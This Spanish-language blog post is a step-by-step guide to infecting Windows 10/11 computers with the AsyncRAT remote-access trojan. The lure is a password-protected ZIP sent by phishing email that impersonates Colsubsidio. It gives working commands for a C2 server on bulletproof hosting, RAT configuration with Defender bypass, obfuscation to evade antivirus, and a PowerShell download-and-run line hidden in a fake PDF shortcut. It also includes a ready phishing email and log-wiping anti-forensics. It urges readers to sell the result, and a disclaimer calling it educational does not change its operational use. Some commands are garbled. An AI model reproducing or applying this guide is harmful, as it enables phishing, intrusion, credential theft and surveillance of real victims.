Guía Práctica 1: Acceso Remoto en Windows 10/11 con el RAT AsyncRAT Encapsulado en Archivo .ZIP Almacenado en Google Drive y Enviado por G-MAIL

Guía Definitiva para Hackear una computadora con Windows 10/11 usando el RAT AsyncRAT comprimido en Archivo .ZIP almacenado en Google Drive y enviado por medio de corre G-MAIL.

El ataque comienza cuando la víctima recibe un correo phishing que simula ser una entidad oficial (ej. Colsubsidio) y descarga un archivo ZIP protegido con contraseña; al extraerlo y abrir el archivo disfrazado de PDF, se ejecuta un comando oculto de PowerShell que conecta con Google Drive solo para descargar silenciosamente el ejecutable del RAT (AsyncRAT) en su sistema. En este punto, Google Drive deja de intervenir y el Malware procede a instalarse y evadir antivirus, conectándose inmediatamente a tu VPS (Servidor C2) configurado para escuchar en un puerto específico. Una vez establecida esta conexión, el VPS asume el control total, permitiéndote monitorear la víctima en tiempo real, robar credenciales, visualizar su escritorio y ejecutar comandos remotos, convirtiendo a tu servidor en el cerebro invisible que domina la máquina infectada. 💀🖥️🔥

1. Análisis Defensivo de la Cadena de Ataque – Objetivo del ataque

La guía busca:

  1. Engañar a la víctima mediante phishing
  2. Infectar Windows 10/11
  3. Instalar un RAT como AsyncRAT
  4. Obtener acceso remoto persistente
  5. Robar información
  6. Evadir antivirus
  7. Usar servicios legítimos como Google Drive para ocultarse

2. Flujo Real del Ataque (Defensivamente)

Correo phishing

PDF falso / ZIP protegido

Usuario descarga archivo desde Google Drive

Archivo LNK o script PowerShell

Descarga del payload

Ejecución del RAT

Persistencia en Windows

Conexión al servidor C2

Robo de información / control remoto

3. Porque Funciona esta Técnica de Ataque?

Los sistemas de correo electrónico no detectan un RAT (Troyano de Acceso Remoto) dentro de un archivo .zip principalmente porque el contenido está empaquetado y a menudo cifrado, lo que impide que los antivirus tradicionales lean el código interno a primera vista.

⚙️ Mecanismos de Evasión

  • Ofuscación de código: El archivo comprimido esconde la firma digital del malware, haciendo que el escáner del correo solo vea un archivo binario genérico.
  • Cifrado con contraseña: Si el atacante le pone contraseña al .zip (común en correos de phishing), el servidor de correo tiene prohibido legalmente y técnicamente romper ese cifrado para inspeccionarlo.
  • Compresión múltiple: Los atacantes meten un .zip dentro de otro .zip (anidamiento), lo que agota el tiempo de escaneo del servidor y hace que este rinda la inspección por rendimiento.
  • Malware polimórfico: El RAT cambia su estructura interna en cada envío, por lo que su huella digital no coincide con ninguna base de datos de virus conocidos.

🛡️ Limitaciones del Servidor de Correo

Políticas de privacidad: Los proveedores de correo evitan abrir archivos privados de los usuarios a menos que un algoritmo automatizado detecte algo flagrante en la superficie.

Optimización de tiempo: Los servidores procesan millones de correos por segundo; no pueden dedicar minutos a descompilar archivos complejos.

HERRAMIENTAS

  1. Ingeniería Social a la Victima
  2. OSINT
  3. Crear correo Gmail Phishing, con logo y nombre de la entidad suplantada
  4. VPS Bulletproof: Un VPS (Servidor Privado Virtual) a prueba de balas, también conocido como Bulletproof Hosting (BPH) o Offshore, es un servicio de alojamiento tolerante al abuso que destaca por ignorar solicitudes de eliminación (DMCA) y tener políticas de contenido muy flexibles. Estos servidores, populares por proteger la identidad y garantizar la libertad de expresión, suelen encontrarse en jurisdicciones como Islandia, Países Bajos, Rumania o Suiza.
  5. Cuenta de Google Drive, vinculada al correo Phishing
  6. RAT AsyncRAT
  7. Visual Studio Code
  8. Plantilla Phishing Correo HTML ( Logo – Imágenes )

2. PREPARA TU SERVIDOR DE MANDO (en VPS)
2.1 Conectate por SSH

ssh root@TU_IP_PUBLICA

2.2 Instala mono (para ejecutar AsyncRAT-Server en Linux)

apt update && apt upgrade -y
apt install mono-complete screen -y

2.3 Abre puerto escucha

ufw allow 6666/tcp
ufw --force enable

Resultado esperado: VPS lista, puerto 6666 abierto.

3. DESCARGA Y COMPILACIÓN DEL CLIENTE (RAT)
3.1 Clona código limpio

git clone https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp.git

3.2 Abre AsyncRAT-C-Sharp/AsyncRAT.sln  con Visual Studio 2022
3.3 En Explorador de Soluciones despliega Client ➝ Config ➝ Settings.cs .
3.4 Replace TODO el bloque de arriba

csharpCopy
public static string Hosts = "TU_IP_PUERTO";   //←ej: 45.33.14.88:6666
public static string Version = "1.0.0";
public static string InstallFolder = "AppData";
public static string InstallFile = "Datospersonales.exe";
public static string AsyncMutex = "AsyncMutex_2026Evil";
public static bool AntiVM = true;
public static bool BypassDefender = true;

Guarda  Ctrl+S.

3.5 Compila

  • Barra superior VS ➝ Se:
    • Conf Release
    • Plataforma: x64
    • Menu Build  → Build Solution
      Al final aparece “Build: 1 succeeded”.

3.6 RAT ya creado en
AsyncRAT-C-Sharp/Client/bin/Release/AsyncRAT-Client.exe


4. OFUSCACIÓN → ANTI-ANTIVIRUS
4.1 Descomprime ConfuserEx-CLI en folder aparte; copia dentro tu AsyncRAT-Client.exe
4.2 Lanza:

cmdCopy
ConfuserEx.exe -no AsyncRAT-Client.exe

4.3 Salida → AsyncRAT-Client-Protected.exe (35-70 % menos detectado).

Opción extra: sube a https://www.virustotal.com – si ≥ 10 detectores vuelve a ofuscar con settings máx (rename, ctrl-flow, constants).


5. CREA TU ARCHIVO “PDF-BOMBA”
Objetivo: la víctima cre que abre un PDF, pero realmente dispara PowerShell bajando tu RAT).

5.1 Construye script PowerShell de un solo línea (cámbiale espacios TU_ID_DRIVE)

$client = New-Object System.Net.WebClient; $url="https GOCET/uc?export=download&id=TU_ID_DRIVE; $out="$env:APPDATA\Datospersonales.exe"; $client.DownloadFile($url,$out; Start-Process $out -WindowStyle Hidden

5.2 Convierte línea anterior a bat-to-ps1 invisible (te evitas ventana negra)
– Abre bloc de notas ➝ pega línea ➝ guardar ps1
5.3 Crea acceso directo (.lnk)que apunte al ps1 pero con ícono de Adobe PDF:
• Click-dcho escritorio → Nuevo ➝ Acceso directo
• Escribe:

cmdCopy
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "%APPDATA%\descarga.ps1"

• Cambiar ícono ➝ examina C:\Windows\System32\shell32.dll → elige ícono #102 (PDF).
• Nombralo Datospersonales.pdf.lnk ➝ luego Elimina la extensión .lnk (Windows la oculta automát; usuario verá solo Datospersonales.pdf).

5.4 Empaqueta

  • Selecciona PDF-falso (Datospersonales.pdf.lnk)
  • Click-dcho ➝ 7-Zip ➝ “Añadir a archive…”
    – Marca: Encrypt ➝ contraseña: colsubsidio2026
    Salida: Datospersonales.zip

6. MONTA EL CORREO PHISHING (Gmail outlook)
6.1 Abre cuenta Gmail recién creada con nombre parecido a colsubsidio.soporte@gmail.com
6.2 Redacta (modo HTML activado):

htmlCopy
Asunto: Verificación de datos – Beneficios 2024 🟡

<body style="font-family: Arial; color:#333;">
<p>Hola afiliado,</p>
<p>Necesitamos confirmar sus datos para seguir recibiendo los beneficios de Colsubsidio.</p>
<p><strong>PASO 1:</strong> Descargue el formulario adjunto.</p>
<p><strong,PASO 2:</strong> Contraseña del archivo: <span style="background:#ff0;">colsubsidio2026</span></p>
<p><em>Atte., Subgerencia de Beneficios</em></p>
<img src="https://www.colsubsidio.com/images/logo.png" width="180"/>
</body>

6.3 Adjunta ZIP protegido.
6.4 Envía 1-3 correos diarios máx (evita SPAM).


7. LADO SERVIDOR – LEVANTA EL C2
7.1 Sube AsyncRAT-Server (contenido que descargaste) al VPS

bashCopy
scp -r AsyncRAT-C-Sharp/Server usuario@TU_IP:/home/us

7.2 Ejecuta servidor (usa screen para que no muera al salir)

bashCopy
screen -S rat
cd /home/usuantes
rat/AsyncRAT-AsyncRAT-Server.exe

Ventana interna de Server aparece; minimiza o deja corriendo.


8. PRUEBA REAL EN TU PROPIA MÁQUINA
8.1 Lanz el .zip contra sí mismo (o VM Windows 10/11).
8.2 Abre AsyncRAT-Server ➝ verás IP propia conectada (green line).
8.3 Click-dcho víctima ➝ Functions:
• Remote Desktop
• Keylogger
• Subir/Bajar archivos
Si funciona – EMPAQUETA Y VENDE; si no – revisa firewall Windows de la víctima y tu VPS.


9. LIMPIEZA Y ANTI-FORENSE
9.1 En víctima tu RAT incluye log-wiper.bat:

cmdCopy
wevtutil cl System
wevtutil cl Security
del /q /f %TEMP%\*
del /q /f 0 %USERPROFILE%\Recent\*

9.2 Timestom (opcional) cambia fecha/hora del.exe:

bashCopy
timestomp.exe  Async-Client-Protected.exe  -d "01/01/2022 12:00:00"

“Espero que esta guía técnica sea un recurso valioso para comprender la arquitectura de los ataques RAT y la dinámica del control remoto. Sin embargo, queda explícitamente establecido que no nos hacemos responsables por el mal uso de esta información, la aplicación ilegal o los daños derivados de este material.
Esta información se proporciona con fines estrictamente educativos y de investigación en entornos controlados; la responsabilidad recae exclusivamente en el usuario final de decidir cómo actuar en el mundo digital.” 💀⚖️🔥😈



mSpy –🚨La Mejor Aplicación Para Hackear Teléfonos (Android – Iphone) & Computadoras (Windows – IOS)🚨

Leave a Reply

Your email address will not be published. Required fields are marked *